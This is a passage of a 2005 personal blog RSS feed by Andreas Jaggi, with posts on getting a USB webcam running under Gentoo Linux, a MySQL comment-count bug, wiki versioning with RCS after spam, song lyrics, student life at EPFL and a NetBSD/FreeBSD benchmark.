  10425. <p>Von <a href="" title="USBView">usbview</a> wurde die Webcam auch nicht erkannt. Also super Voraussetzungen für einen Betrieb mit Linux.<br>
  10426. </p>
  10428. <p>Nach etwas <a href="" title="">googeln</a> fand ich <a href="" title="SPCA50X USB Camera Linux Driver"></a> und das entsprechende <a href="" title="spca5xx Download">2.6er-Kernerlmodul</a>. Erfreulicherweise ist das auch im <a href="">Portage-Tree</a> von <a href="" title="Gentoo Linux">Gentoo</a>. Also schnell ein <code>emerge spca5xx</code>. Ein <code>modprobe spca5xx</code>
  10429. lässt einige Fehlermeldungen erscheinen (Unresolved Symbols). Abhilfe
  10430. schafft das Aktivieren der Video for Linux Unterstützung im <a href="" title="">Kernel</a>.
  10431. Nach <code>make</code>, <code>make modules</code> und <code>make modules_install</code>
  10432. lädt das spca5xx Modul problemlos (eigentlich sollte man nach einem
  10433. Neukompilieren des Kernels auch den neuen Kernel laden und nicht nur
  10434. die neuen Module!).</p>
  10436. <p>Ein <code>chmod a+rx /dev/video0</code> als <code>root</code> behebt Berechtigunsprobleme, welche beim Zugriff als normaler Benutzer auftreten können.
  10437. </p>
  10439. <p>Fazit:</p>
  10441. <ul>
  10442. <li>Die Webcam bietet IMHO mehr als man für 30 CHF erwarten kann</li>
  10444. <li>Mit Linux kann man ohne Neustart Peripheriegeräte von 'unbekannt' zu 'vollständig unterstützt' ändern</li>
  10445. </ul>
  10446. ]]></description>
  10447.    <content:encoded><![CDATA[<a href="" style="border: 0px none ;" title="Typhoon Webshot II (Klick für grössere Ansicht)"><img width="290" height="158" src="" alt="Typhoon Webshot II (Thumbnail)" title="Typhoon Webshot II (Klick für grössere Ansicht)" style="border: 0px none ;"></a>
  10448. <p>Heute habe ich beim Einkaufen diese 'Webcam' entdeckt. Für 29.90 CHF
  10449. (~20&#8364;) bietet sie bis zu 30 640&#215;480 Pixel grosse Bilder pro Sekunde.
  10450. Mit dabei eine CD mit Treiber für Windows 98 bis XP.
  10451. </p>
  10453. <p>Als ich sie an mein Linux-PowerBook anschloss sagte mir <code>dmesg</code> nur gerade diese zwei Zeilen:
  10454. </p>
  10456. <pre><code>ohci_hcd 0001:01:1b.0: remote wakeup
  10457. usb 3-1: new full speed USB device using address 2</code></pre>
  10458. <p>Von <a href="" title="USBView">usbview</a> wurde die Webcam auch nicht erkannt. Also super Voraussetzungen für einen Betrieb mit Linux.<br>
  10459. </p>
  10461. <p>Nach etwas <a href="" title="">googeln</a> fand ich <a href="" title="SPCA50X USB Camera Linux Driver"></a> und das entsprechende <a href="" title="spca5xx Download">2.6er-Kernerlmodul</a>. Erfreulicherweise ist das auch im <a href="">Portage-Tree</a> von <a href="" title="Gentoo Linux">Gentoo</a>. Also schnell ein <code>emerge spca5xx</code>. Ein <code>modprobe spca5xx</code>
  10462. lässt einige Fehlermeldungen erscheinen (Unresolved Symbols). Abhilfe
  10463. schafft das Aktivieren der Video for Linux Unterstützung im <a href="" title="">Kernel</a>.
  10464. Nach <code>make</code>, <code>make modules</code> und <code>make modules_install</code>
  10465. lädt das spca5xx Modul problemlos (eigentlich sollte man nach einem
  10466. Neukompilieren des Kernels auch den neuen Kernel laden und nicht nur
  10467. die neuen Module!).</p>
  10469. <p>Ein <code>chmod a+rx /dev/video0</code> als <code>root</code> behebt Berechtigunsprobleme, welche beim Zugriff als normaler Benutzer auftreten können.
  10470. </p>
  10472. <p>Fazit:</p>
  10474. <ul>
  10475. <li>Die Webcam bietet IMHO mehr als man für 30 CHF erwarten kann</li>
  10477. <li>Mit Linux kann man ohne Neustart Peripheriegeräte von 'unbekannt' zu 'vollständig unterstützt' ändern</li>
  10478. </ul>
  10479. ]]></content:encoded>
  10480.  </item>
  10482.  <item>
  10483.    <title>Bug in MySQL 4.1.10a?</title>
  10484.    <link></link>
  10485.    <guid isPermaLink="true"></guid>
  10486.    <dc:creator>Andreas Jaggi</dc:creator>
  10487.    <creativeCommons:license></creativeCommons:license>
  10488.    <pubDate>Fri, 01 Apr 2005 22:01:00 +0200</pubDate>
  10489.    <category domain="">Coding</category>
  10490.    <description><![CDATA[<p>Bisher wurden die Einträge der Indexseite mit diesem SQL-Statement abgefragt:
  10491. </p>
  10493. <pre><code>SELECT w.*, a.nick AS nick, AS categoryname,
  10494. count( AS comments,
  10495. AS languagename, l.code AS lc
  10496. FROM `x-log_weblog` AS w, `x-log_authors` AS a,
  10497. `x-log_languages` AS l, `x-log_categories` AS cat
  10498. LEFT JOIN `x-log_comments` AS c ON = c.posting
  10499. WHERE =
  10500. AND = w.category
  10501. AND &lt;= NOW()
  10502. AND w.public = '1'
  10503. AND w.language &amp; &gt; 0
  10504. GROUP BY
  10505. ORDER BY DESC</code></pre>
  10506. <p>Doch seit <a href="" title="Hostpoint - The Data Residence">Hostpoint</a> auf <a href="" title="MySQL: Die populärste Open-Source-Datenbank der Welt">MySQL</a> 4.1.10a umgestellt hat, stimmt die Anzahl der Kommentare nicht mehr.</p>
  10508. <p>Nach diversen erfolglosen Versuchen die <code>LEFT JOIN</code> Anweisung zu ändern, habe ich in einem <a href="" title="MySQL Bugs: #8821: join to subquery without distinct causes bad COUNT">Bugreport</a> eine Lösung gefunden:</p>
  10510. <pre><code>count(DISTINCT</code></pre>
  10511. <p>Mangels spezifischer Kenntnisse kann ich nicht beurteilen ob das nun
  10512. ein Bug oder ein Feature ist. Aber da mehrere Bugreports dazu
  10513. existieren scheint es eher ein Bug zu sein.</p>
  10514. ]]></description>
  10515.    <content:encoded><![CDATA[<p>Bisher wurden die Einträge der Indexseite mit diesem SQL-Statement abgefragt:
  10516. </p>
  10518. <pre><code>SELECT w.*, a.nick AS nick, AS categoryname,
  10519. count( AS comments,
  10520. AS languagename, l.code AS lc
  10521. FROM `x-log_weblog` AS w, `x-log_authors` AS a,
  10522. `x-log_languages` AS l, `x-log_categories` AS cat
  10523. LEFT JOIN `x-log_comments` AS c ON = c.posting
  10524. WHERE =
  10525. AND = w.category
  10526. AND &lt;= NOW()
  10527. AND w.public = '1'
  10528. AND w.language &amp; &gt; 0
  10529. GROUP BY
  10530. ORDER BY DESC</code></pre>
  10531. <p>Doch seit <a href="" title="Hostpoint - The Data Residence">Hostpoint</a> auf <a href="" title="MySQL: Die populärste Open-Source-Datenbank der Welt">MySQL</a> 4.1.10a umgestellt hat, stimmt die Anzahl der Kommentare nicht mehr.</p>
  10533. <p>Nach diversen erfolglosen Versuchen die <code>LEFT JOIN</code> Anweisung zu ändern, habe ich in einem <a href="" title="MySQL Bugs: #8821: join to subquery without distinct causes bad COUNT">Bugreport</a> eine Lösung gefunden:</p>
  10535. <pre><code>count(DISTINCT</code></pre>
  10536. <p>Mangels spezifischer Kenntnisse kann ich nicht beurteilen ob das nun
  10537. ein Bug oder ein Feature ist. Aber da mehrere Bugreports dazu
  10538. existieren scheint es eher ein Bug zu sein.</p>
  10539. ]]></content:encoded>
  10540.  </item>
  10542.  <item>
  10543.    <title>Lang – Kurz</title>
  10544.    <link></link>
  10545.    <guid isPermaLink="true"></guid>
  10546.    <dc:creator>Andreas Jaggi</dc:creator>
  10547.    <creativeCommons:license></creativeCommons:license>
  10548.    <pubDate>Fri, 01 Apr 2005 00:33:47 +0200</pubDate>
  10549.    <category domain="">Misc</category>
  10550.    <description><![CDATA[<img width="303" height="209" src="" title="Lang - Kurz" alt="Lang - Kurz" style="border: 0;">
  10551. ]]></description>
  10552.    <content:encoded><![CDATA[<img width="303" height="209" src="" title="Lang - Kurz" alt="Lang - Kurz" style="border: 0;">
  10553. ]]></content:encoded>
  10554.  </item>
  10556.  <item>
  10557.    <title>Samael – On Earth</title>
  10558.    <link></link>
  10559.    <guid isPermaLink="true"></guid>
  10560.    <dc:creator>Andreas Jaggi</dc:creator>
  10561.    <creativeCommons:license></creativeCommons:license>
  10562.    <pubDate>Sun, 06 Mar 2005 17:39:36 +0100</pubDate>
  10563.    <category domain="">Music</category>
  10564.    <description><![CDATA[<img src="" width="200" height="210" alt="Samael - Reign Of Light" title="Samael - Reign Of Light">
  10565. <p>
  10566. Before we could talk<br>
  10567. We were singing<br>
  10568. Before we could run<br>
  10569. We were dancing<br>
  10570. Life is short<br>
  10571. But not a day is lost<br>
  10572. The world goes round and round<br>
  10573. And we go on and on…<br>
  10574. </p>
  10575. <br><br>
  10576. <p>
  10577. Beijing to Amsterdam<br>
  10578. Berlin to Buenos Aires<br>
  10579. Sydney to L.A.<br>
  10580. Rio to Abidjan<br>
  10581. Stockholm to Athena<br>
  10582. Dublin to Guatemala<br>
  10583. London to Brasilia<br>
  10584. Madrid to Philadelphia<br>
  10585. </p>
  10586. <p>
  10587. Paris to San Francisco<br>
  10588. Detroit to Warszawa<br>
  10589. Moscow to Mexico<br>
  10590. Oslo to New Dehli<br>
  10591. Helsinki to New Orleans<br>
  10592. Vienna to Ankara<br>
  10593. Roma to Lisboa<br>
  10594. On earth, we're all<br>
  10595. </p>
  10596. <p>
  10597. Dancing with the hidden tribe<br>
  10598. Learning to move and fly<br>
  10599. Touching the sky with our hands<br>
  10600. Longing to love to understand<br>
  10601. </p>
  10602. <p>
  10603. Dancing with the hidden tribe<br>
  10604. Learning to move and fly<br>
  10605. Touching the sky with our hands<br>
  10606. Longing to love to understand<br>
  10607. </p>
  10608. <p>
  10609. Wide World!<br>
  10610. Our World!<br>
  10611. </p>
  10612. <p>
  10613. New York to Tokyo<br>
  10614. Melbourne to Budapest<br>
  10615. Prague to Jaipur<br>
  10616. Shangai to Montreal<br>
  10617. Vancouver to Singapore<br>
  10618. Sofia to Johannesburg<br>
  10619. Hong Kong to St. Petersburg<br>
  10620. On earth, we're all<br>
  10621. </p>
  10622. <p>
  10623. Dancing with the hidden tribe<br>
  10624. Learning to move and fly<br>
  10625. Touching the sky with our hands<br>
  10626. Longing to love to understand<br>
  10627. </p>
  10628. <p>
  10629. Dancing with the hidden tribe<br>
  10630. Learning to move and fly<br>
  10631. Touching the sky with our hands<br>
  10632. Longing to love to understand<br>
  10633. </p>
  10634. <p>
  10635. Wide World!<br>
  10636. Wide World!<br>
  10637. Our World!<br>
  10638. </p>
  10639. <p>
  10640. Dancing with the hidden tribe<br>
  10641. Learning to move and fly<br>
  10642. Touching the sky with our hands<br>
  10643. Longing to love to understand<br>
  10644. </p>
  10645. <p>
  10646. Dancing with the hidden tribe<br>
  10647. Learning to move and fly<br>
  10648. Touching the sky with our hands<br>
  10649. Longing to love to understand<br>
  10650. </p>
  10651. ]]></description>
  10652.    <content:encoded><![CDATA[<img src="" width="200" height="210" alt="Samael - Reign Of Light" title="Samael - Reign Of Light">
  10653. <p>
  10654. Before we could talk<br>
  10655. We were singing<br>
  10656. Before we could run<br>
  10657. We were dancing<br>
  10658. Life is short<br>
  10659. But not a day is lost<br>
  10660. The world goes round and round<br>
  10661. And we go on and on…<br>
  10662. </p>
  10663. <br><br>
  10664. <p>
  10665. Beijing to Amsterdam<br>
  10666. Berlin to Buenos Aires<br>
  10667. Sydney to L.A.<br>
  10668. Rio to Abidjan<br>
  10669. Stockholm to Athena<br>
  10670. Dublin to Guatemala<br>
  10671. London to Brasilia<br>
  10672. Madrid to Philadelphia<br>
  10673. </p>
  10674. <p>
  10675. Paris to San Francisco<br>
  10676. Detroit to Warszawa<br>
  10677. Moscow to Mexico<br>
  10678. Oslo to New Dehli<br>
  10679. Helsinki to New Orleans<br>
  10680. Vienna to Ankara<br>
  10681. Roma to Lisboa<br>
  10682. On earth, we're all<br>
  10683. </p>
  10684. <p>
  10685. Dancing with the hidden tribe<br>
  10686. Learning to move and fly<br>
  10687. Touching the sky with our hands<br>
  10688. Longing to love to understand<br>
  10689. </p>
  10690. <p>
  10691. Dancing with the hidden tribe<br>
  10692. Learning to move and fly<br>
  10693. Touching the sky with our hands<br>
  10694. Longing to love to understand<br>
  10695. </p>
  10696. <p>
  10697. Wide World!<br>
  10698. Our World!<br>
  10699. </p>
  10700. <p>
  10701. New York to Tokyo<br>
  10702. Melbourne to Budapest<br>
  10703. Prague to Jaipur<br>
  10704. Shangai to Montreal<br>
  10705. Vancouver to Singapore<br>
  10706. Sofia to Johannesburg<br>
  10707. Hong Kong to St. Petersburg<br>
  10708. On earth, we're all<br>
  10709. </p>
  10710. <p>
  10711. Dancing with the hidden tribe<br>
  10712. Learning to move and fly<br>
  10713. Touching the sky with our hands<br>
  10714. Longing to love to understand<br>
  10715. </p>
  10716. <p>
  10717. Dancing with the hidden tribe<br>
  10718. Learning to move and fly<br>
  10719. Touching the sky with our hands<br>
  10720. Longing to love to understand<br>
  10721. </p>
  10722. <p>
  10723. Wide World!<br>
  10724. Wide World!<br>
  10725. Our World!<br>
  10726. </p>
  10727. <p>
  10728. Dancing with the hidden tribe<br>
  10729. Learning to move and fly<br>
  10730. Touching the sky with our hands<br>
  10731. Longing to love to understand<br>
  10732. </p>
  10733. <p>
  10734. Dancing with the hidden tribe<br>
  10735. Learning to move and fly<br>
  10736. Touching the sky with our hands<br>
  10737. Longing to love to understand<br>
  10738. </p>
  10739. ]]></content:encoded>
  10740.  </item>
  10742.  <item>
  10743.    <title></title>
  10744.    <link></link>
  10745.    <guid isPermaLink="true"></guid>
  10746.    <dc:creator>Andreas Jaggi</dc:creator>
  10747.    <creativeCommons:license></creativeCommons:license>
  10748.    <pubDate>Tue, 22 Feb 2005 13:32:04 +0100</pubDate>
  10749.    <category domain="">Coding</category>
  10750.    <description><![CDATA[<p>A month ago or so, someone <a title="Spammed" href=";r=1.5">spammed</a> my <a title="" href="">Wiki</a> with asian links. This overwrote all my data because <a title="PhikiWiki (" href="">PhikiWiki</a>
  10751. doesn't have a backup-mechanism or a versioning system. Since i had a
  10752. backup of the webserver, i could restore the Wiki. But i didn't want to
  10753. restore manually the backup via FTP each time someone overwrites my
  10754. Data.
  10755. </p>
  10757. <p>So i built a versioning system based on <a title="RCS - GNU Project" href=""><code>rcs</code></a>. I've searched the write and read functions in the code and added just an <code>co</code> before the read function and a <code>ci</code> before the write function.</p>
  10759. <p>Now each time someone changes a document, it's stored as a new
  10760. version of the document. The different versions are made accesible by
  10761. the <code>r=</code> GET-parameter (example: version <a title="FrontPage - Version 1.38" href=";r=1.38">1.38</a> and <a title="FrontPage - Version 1.50" href=";r=1.50">1.50</a> of <a title="FrontPage" href="">FrontPage</a>).<br>
  10762. If now someone fills my Wiki with spam, i can just load the last good
  10763. version and store it as the new version. No need to replay a backup via
  10764. FTP.</p>
  10766. <p>The syntax of <a title="PhikiWiki (" href="">PhikiWiki</a> doesn't have enough features for my needs, so i decided to use <a title="Daring Fireball: Markdown" href="">Markdown</a> instead. I just removed all the formatting stuff of phiki and added a simple <code>Markdown($txt);</code> call.</p>
  10767. ]]></description>
  10768.    <content:encoded><![CDATA[<p>A month ago or so, someone <a title="Spammed" href=";r=1.5">spammed</a> my <a title="" href="">Wiki</a> with asian links. This overwrote all my data because <a title="PhikiWiki (" href="">PhikiWiki</a>
  10769. doesn't have a backup-mechanism or a versioning system. Since i had a
  10770. backup of the webserver, i could restore the Wiki. But i didn't want to
  10771. restore manually the backup via FTP each time someone overwrites my
  10772. Data.
  10773. </p>
  10775. <p>So i built a versioning system based on <a title="RCS - GNU Project" href=""><code>rcs</code></a>. I've searched the write and read functions in the code and added just an <code>co</code> before the read function and a <code>ci</code> before the write function.</p>
  10777. <p>Now each time someone changes a document, it's stored as a new
  10778. version of the document. The different versions are made accesible by
  10779. the <code>r=</code> GET-parameter (example: version <a title="FrontPage - Version 1.38" href=";r=1.38">1.38</a> and <a title="FrontPage - Version 1.50" href=";r=1.50">1.50</a> of <a title="FrontPage" href="">FrontPage</a>).<br>
  10780. If now someone fills my Wiki with spam, i can just load the last good
  10781. version and store it as the new version. No need to replay a backup via
  10782. FTP.</p>
  10784. <p>The syntax of <a title="PhikiWiki (" href="">PhikiWiki</a> doesn't have enough features for my needs, so i decided to use <a title="Daring Fireball: Markdown" href="">Markdown</a> instead. I just removed all the formatting stuff of phiki and added a simple <code>Markdown($txt);</code> call.</p>
  10785. ]]></content:encoded>
  10786.  </item>
  10788.  <item>
  10789.    <title>v2_05-rc1</title>
  10790.    <link></link>
  10791.    <guid isPermaLink="true"></guid>
  10792.    <dc:creator>Andreas Jaggi</dc:creator>
  10793.    <creativeCommons:license></creativeCommons:license>
  10794.    <pubDate>Tue, 22 Feb 2005 12:13:24 +0100</pubDate>
  10795.    <category domain="">Coding</category>
  10796.    <description><![CDATA[<p>Wie immer in den Ferien bastle ich ein bisschen an meinem Weblog rum.</p>
  10798. <p>Dem allgemeinen Trend folgend, werden hier nun auch <a href="" title="">Gravatare</a> unterstützt (Das sind die kleinen Bildchen, welche anhand der E-Mail Adresse angezeigt werden. <a href="" title="Gravatar Beispiel">Beispiel</a>). Wer noch keinen hat, einfach bei <a href="" title="Gravatar"></a> die E-Mail Adresse registrieren, Bild hinaufladen fertig :-)</p>
  10800. <p>Seit Anfang dieses Jahres gibt es hier nebst deutschen und französischen Inhalten auch noch <a href="" title="English">englische Beiträge</a>. Bei den <a href="" title="x-log - Einstellungen">Einstellungen</a>, kann man sich eine beliebige Kombination zusammenmixen.</p>
  10802. <p>Das Admininterface habe ich mit Hilfe von <a href="" title="Get dynamic Web content with HTTPRequest">xmlHTTPRequest</a> um einen <a href="" title=" - JavaScript">JavaScript</a> <a href="" title="TrackBack Technical Specification (">TrackBack</a>
  10803. Client erweitert.<br>
  10804. Leider erlaubt Mozilla keine xmlHTTPRequests auf eine
  10805. andere als die eigene Domain, was die Nutzung sehr einschränkt. Aber
  10806. vielleicht folgt Mozilla in Zukunft dem Beispiel von Safari und erlaubt
  10807. GET-Requests auf beliebige Domains.
  10808. </p>
  10809. ]]></description>
  10810.    <content:encoded><![CDATA[<p>Wie immer in den Ferien bastle ich ein bisschen an meinem Weblog rum.</p>
  10812. <p>Dem allgemeinen Trend folgend, werden hier nun auch <a href="" title="">Gravatare</a> unterstützt (Das sind die kleinen Bildchen, welche anhand der E-Mail Adresse angezeigt werden. <a href="" title="Gravatar Beispiel">Beispiel</a>). Wer noch keinen hat, einfach bei <a href="" title="Gravatar"></a> die E-Mail Adresse registrieren, Bild hinaufladen fertig :-)</p>
  10814. <p>Seit Anfang dieses Jahres gibt es hier nebst deutschen und französischen Inhalten auch noch <a href="" title="English">englische Beiträge</a>. Bei den <a href="" title="x-log - Einstellungen">Einstellungen</a>, kann man sich eine beliebige Kombination zusammenmixen.</p>
  10816. <p>Das Admininterface habe ich mit Hilfe von <a href="" title="Get dynamic Web content with HTTPRequest">xmlHTTPRequest</a> um einen <a href="" title=" - JavaScript">JavaScript</a> <a href="" title="TrackBack Technical Specification (">TrackBack</a>
  10817. Client erweitert.<br>
  10818. Leider erlaubt Mozilla keine xmlHTTPRequests auf eine
  10819. andere als die eigene Domain, was die Nutzung sehr einschränkt. Aber
  10820. vielleicht folgt Mozilla in Zukunft dem Beispiel von Safari und erlaubt
  10821. GET-Requests auf beliebige Domains.
  10822. </p>
  10823. ]]></content:encoded>
  10824.  </item>
  10826.  <item>
  10827.    <title>Fin des Examens de printemps</title>
  10828.    <link></link>
  10829.    <guid isPermaLink="true"></guid>
  10830.    <dc:creator>Andreas Jaggi</dc:creator>
  10831.    <creativeCommons:license></creativeCommons:license>
  10832.    <pubDate>Fri, 18 Feb 2005 17:15:36 +0100</pubDate>
  10833.    <category domain="">School</category>
  10834.    <description><![CDATA[<p>Hier je me suis lev&#233; &#224; 5.30h apr&#232;s 5 heures de sommeil pour prendre
  10835. le train de 6.43 en direction Renens. Avec le TSOL je suis arriv&#233; &#224;
  10836. l'<a href="" title="École Polytechnique Fédérale de Lausanne">EPFL</a> pour faire cette merde d'&#233;xamen <a href="" title="Informatique Théorique III (">informatique th&#233;orique III</a>.</p>
  10838. <p>&#192; midi j'ai mang&#233; avec mes copains et puis on est all&#233; &#224; <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a>: Pichet. Pichet. Pichet. Pichet. Pichet. Pichet. Pichet.</p>
  10840. <p>
  10841. Ensuite j'ai d&#238;n&#233; chez un copain avant d'aller au <a href="" title="Planète bleue">Plan&#232;te bleue</a> ou on a
  10842. continue la f&#234;te de fin des &#233;xamens avec pas mal de Vodka.<br>
  10843. Apr&#232;s minuit on est all&#233; au Jaggers. Vers 4 heures on est sortie du Jaggers et ceux qui habitent en ville se sont couch&#233;s.</p>
  10845. <p>Mais mois et un copain qui n'habite pas en ville, nous sommes march&#233;s &#224; <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> car il n'y a pas de TSOL &#224; cette heure.<br>
  10846. Vers 5 heures on y est arriv&#233;. Heureusement <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> &#233;tait ouvert toute la nuit.<br>
  10847. Puis je suis retourn&#233; &#224; Vufflens-la-Ville avec le TSOL et le train apr&#232;s 7 heures.</p>
  10849. <p>
  10850. &#192; 7.30h je me suis enfin couch&#233;, apr&#232;s 26 heures sans sommeil dont 19 de la f&#234;te.</p>
  10851. ]]></description>
  10852.    <content:encoded><![CDATA[<p>Hier je me suis lev&#233; &#224; 5.30h apr&#232;s 5 heures de sommeil pour prendre
  10853. le train de 6.43 en direction Renens. Avec le TSOL je suis arriv&#233; &#224;
  10854. l'<a href="" title="École Polytechnique Fédérale de Lausanne">EPFL</a> pour faire cette merde d'&#233;xamen <a href="" title="Informatique Théorique III (">informatique th&#233;orique III</a>.</p>
  10856. <p>&#192; midi j'ai mang&#233; avec mes copains et puis on est all&#233; &#224; <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a>: Pichet. Pichet. Pichet. Pichet. Pichet. Pichet. Pichet.</p>
  10858. <p>
  10859. Ensuite j'ai d&#238;n&#233; chez un copain avant d'aller au <a href="" title="Planète bleue">Plan&#232;te bleue</a> ou on a
  10860. continue la f&#234;te de fin des &#233;xamens avec pas mal de Vodka.<br>
  10861. Apr&#232;s minuit on est all&#233; au Jaggers. Vers 4 heures on est sortie du Jaggers et ceux qui habitent en ville se sont couch&#233;s.</p>
  10863. <p>Mais mois et un copain qui n'habite pas en ville, nous sommes march&#233;s &#224; <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> car il n'y a pas de TSOL &#224; cette heure.<br>
  10864. Vers 5 heures on y est arriv&#233;. Heureusement <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> &#233;tait ouvert toute la nuit.<br>
  10865. Puis je suis retourn&#233; &#224; Vufflens-la-Ville avec le TSOL et le train apr&#232;s 7 heures.</p>
  10867. <p>
  10868. &#192; 7.30h je me suis enfin couch&#233;, apr&#232;s 26 heures sans sommeil dont 19 de la f&#234;te.</p>
  10869. ]]></content:encoded>
  10870.  </item>
  10872.  <item>
  10873.    <title>Nach dem Booten</title>
  10874.    <link></link>
  10875.    <guid isPermaLink="true"></guid>
  10876.    <dc:creator>Andreas Jaggi</dc:creator>
  10877.    <creativeCommons:license></creativeCommons:license>
  10878.    <pubDate>Sun, 09 Jan 2005 00:24:59 +0100</pubDate>
  10879.    <category domain="">Misc</category>
  10880.    <description><![CDATA[<p>Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze:</p>
  10882. <ol>
  10885. <li>Einloggen</li>
  10887. <li>startx</li>
  10889. <li>Sylpheed-Claws, Firefox und XMMS starten</li>
  10891. <li>Warten bis die E-Mails abgerufen sind</li>
  10893. <li>E-Mails lesen</li>
  10894. </ol>
  10896. <p>Die ersten 5 Websites, die ich besuche:</p>
  10898. <ol>
  10899. <li>x-log</li>
  10901. <li></li>
  10903. <li></li>
  10905. <li>der Rest hängt davon ab, was ich eigentlich am Computer machen wollte</li>
  10907. <li>&#8230;</li>
  10908. </ol>
  10910. <p>Via <a href="" title=" Einschaltrituale ("></a>, <a href="" title="Pocket-Blog (">Pocket-Blog</a>, <a href="" title="LostFocus  Chronologisch und nachgemacht">LostFocus</a>, <a href="" title="Die fünf ersten - Late Night Blog (">Late Night Blog</a>.</p>
  10911. ]]></description>
  10912.    <content:encoded><![CDATA[<p>Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze:</p>
  10914. <ol>
  10917. <li>Einloggen</li>
  10919. <li>startx</li>
  10921. <li>Sylpheed-Claws, Firefox und XMMS starten</li>
  10923. <li>Warten bis die E-Mails abgerufen sind</li>
  10925. <li>E-Mails lesen</li>
  10926. </ol>
  10928. <p>Die ersten 5 Websites, die ich besuche:</p>
  10930. <ol>
  10931. <li>x-log</li>
  10933. <li></li>
  10935. <li></li>
  10937. <li>der Rest hängt davon ab, was ich eigentlich am Computer machen wollte</li>
  10939. <li>&#8230;</li>
  10940. </ol>
  10942. <p>Via <a href="" title=" Einschaltrituale ("></a>, <a href="" title="Pocket-Blog (">Pocket-Blog</a>, <a href="" title="LostFocus  Chronologisch und nachgemacht">LostFocus</a>, <a href="" title="Die fünf ersten - Late Night Blog (">Late Night Blog</a>.</p>
  10943. ]]></content:encoded>
  10944.  </item>
  10946.  <item>
  10947.    <title>Colors</title>
  10948.    <link></link>
  10949.    <guid isPermaLink="true"></guid>
  10950.    <dc:creator>Andreas Jaggi</dc:creator>
  10951.    <creativeCommons:license></creativeCommons:license>
  10952.    <pubDate>Sat, 08 Jan 2005 23:02:15 +0100</pubDate>
  10953.    <category domain="">Webdesign</category>
  10954.    <description><![CDATA[<p>I&#8217;ve found some color resources &amp; utilities on <a href="" title=""></a>.
  10955. These are always useful, especially since i&#8217;m not the person who can
  10956. just throw together three colors and automatically the result looks
  10957. good.</p>
  10959. <ul>
  10960. <li><a href="" title="EasyRGB - Color harmonies, complements and themes">EasyRGB</a> &#8211; Search for color harmonies, complements and themes for your RBG values</li>
  10962. <li><a href="" title="Color Blender">Color Blender</a> &#8211; Calculate midpoint colors</li>
  10964. <li><a href="" title="4096 Color Wheel Version 2.1">4096 Color Wheel</a> &#8211; Color Wheel with corresponding web-safe &amp; web-smart colors</li>
  10966. <li><a href="" title="Spectacle - Color Schemes (">Spectacle</a> &#8211; Tweaked web-smart Color Schemes</li>
  10968. <li><a href="" title="Adam Poselli - Get the Look (">Adam Poselli &#187; Get the Look</a> &#8211; Design &amp; style guides</li>
  10970. <li><a href="" title="Adam Poselli Where'd Ya Get That Color Scheme? (">Adam Poselli &#187; Where&#8217;d Ya Get That Color Scheme?</a> &#8211; Color schemes from photographs</li>
  10972. <li><a href="" title="Adam Poselli's 2005 Color Forecast (">Adam Poselli&#8217;s 2005 Color Forecast</a> &#8211; Colors</li>
  10974. <li><a href="" title="Adam Poselli's 2004 Color Forecast (">Adam Poselli&#8217;s 2004 Color Forecast</a> &#8211; More colors</li>
  10976. <li><a href="" title="mezzoblue Colour Schemes (">mezzoblue &#167; Colour Schemes</a> &#8211; How to select colors</li>
  10977. </ul>
  10978. ]]></description>
  10979.    <content:encoded><![CDATA[<p>I&#8217;ve found some color resources &amp; utilities on <a href="" title=""></a>.
  10980. These are always useful, especially since i&#8217;m not the person who can
  10981. just throw together three colors and automatically the result looks
  10982. good.</p>
  10984. <ul>
  10985. <li><a href="" title="EasyRGB - Color harmonies, complements and themes">EasyRGB</a> &#8211; Search for color harmonies, complements and themes for your RBG values</li>
  10987. <li><a href="" title="Color Blender">Color Blender</a> &#8211; Calculate midpoint colors</li>
  10989. <li><a href="" title="4096 Color Wheel Version 2.1">4096 Color Wheel</a> &#8211; Color Wheel with corresponding web-safe &amp; web-smart colors</li>
  10991. <li><a href="" title="Spectacle - Color Schemes (">Spectacle</a> &#8211; Tweaked web-smart Color Schemes</li>
  10993. <li><a href="" title="Adam Poselli - Get the Look (">Adam Poselli &#187; Get the Look</a> &#8211; Design &amp; style guides</li>
  10995. <li><a href="" title="Adam Poselli Where'd Ya Get That Color Scheme? (">Adam Poselli &#187; Where&#8217;d Ya Get That Color Scheme?</a> &#8211; Color schemes from photographs</li>
  10997. <li><a href="" title="Adam Poselli's 2005 Color Forecast (">Adam Poselli&#8217;s 2005 Color Forecast</a> &#8211; Colors</li>
  10999. <li><a href="" title="Adam Poselli's 2004 Color Forecast (">Adam Poselli&#8217;s 2004 Color Forecast</a> &#8211; More colors</li>
  11001. <li><a href="" title="mezzoblue Colour Schemes (">mezzoblue &#167; Colour Schemes</a> &#8211; How to select colors</li>
  11002. </ul>
  11003. ]]></content:encoded>
  11004.  </item>
  11006.  <item>
  11007.    <title>NetBSD 2.0 vs FreeBSD 5.3</title>
  11008.    <link></link>
  11009.    <guid isPermaLink="true"></guid>
  11010.    <dc:creator>Andreas Jaggi</dc:creator>
  11011.    <creativeCommons:license></creativeCommons:license>
  11012.    <pubDate>Fri, 07 Jan 2005 21:00:56 +0100</pubDate>
  11013.    <category domain="">NetBSD</category>
  11014.    <description><![CDATA[<p>Gregory McGarry has made a <a href="" title="Benchmark Comparison of NetBSD 2.0 and FreeBSD 5.3">benchmark comparison between NetBSD 2.0 and FreeBSD 5.3</a>.<br>(<a href="" title="NetBSD vs FreeBSD (der Benchmark) (">via mindtrap::weblog</a>)</p>
  11015. <p>The main differences are that NetBSD scales <i>O</i>(1) on forking new
  11016. processes while FreeBSD scales <i>O</i>(<i>n</i>). For memory mapping and socket
  11017. creation both scale <i>O</i>(1) but NetBSD is twice as fast as FreeBSD
  11018. <br>But for binding addresses to sockets, FreeBSD scales <i>O</i>(1) while
  11019. NetBSD scales <i>O</i>(<i>n</i>) but is twice as fast for a small number of bound
  11020. sockets. Also for POSIX thread creation FreeBSD scales <i>O</i>(1) while
  11021. NetBSD scales something like <i>O</i>(<i>n</i>) and is twice as fast for a small
  11022. number of threads.</p>
  11023. <blockquote cite="">
  11024. <p>This paper has presented a suite of benchmarks and results for comparing the performance of NetBSD 2.0 and FreeBSD 5.3 in the areas of core operating system functionality, network scalability and thread performance.</p>
